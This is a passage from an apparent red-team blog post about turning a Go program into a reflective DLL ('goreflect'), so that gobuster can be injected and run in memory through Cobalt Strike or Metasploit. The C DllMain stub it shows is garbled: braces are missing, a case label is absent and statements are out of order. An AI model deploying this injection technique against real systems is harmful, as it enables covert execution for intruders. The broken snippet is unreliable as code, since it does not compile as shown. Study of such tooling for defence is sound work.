// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own 
// DllMain and use the LoadRemoteLibraryR() API to inject this DLL.
// You can use this value as a pseudo hinstDLL value (defined and set via ReflectiveLoader.c)
extern HINSTANCE hAppInstance;
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
    BOOL bReturnValue = TRUE;
	switch( dwReason ) 
			if( lpReserved != NULL )
				*(HMODULE *)lpReserved = hAppInstance;
        case DLL_PROCESS_ATTACH: {
			hAppInstance = hinstDLL;
            GoString goArgs;
            goArgs.p = (char*)lpReserved;
            goArgs.n = strlen(lpReserved);
	return bReturnValue;

Inside the DLL_PROCESS_ATTACH case statement, we convert the lpReserved argument to a GoString object, as this is what the start function is expecting as it’s prototype. The lpReserved parameter is what Cobalt Strike and metasploit use to pass arguments to the reflective DLL.

I have made a quick video below showing goreflect in action. Utilizing the inject program from the ReflectiveDLL project, it demonstrates injecting the libgoreflect.dll into itself along with the arguments to send to our in-memory gobuster.

The code for goreflect can be found on GitHub.

That’s it for now. In part two I’ll cover how we can work around the 1MB limit within Cobalt Strike for reflective loading of our goreflect DLL.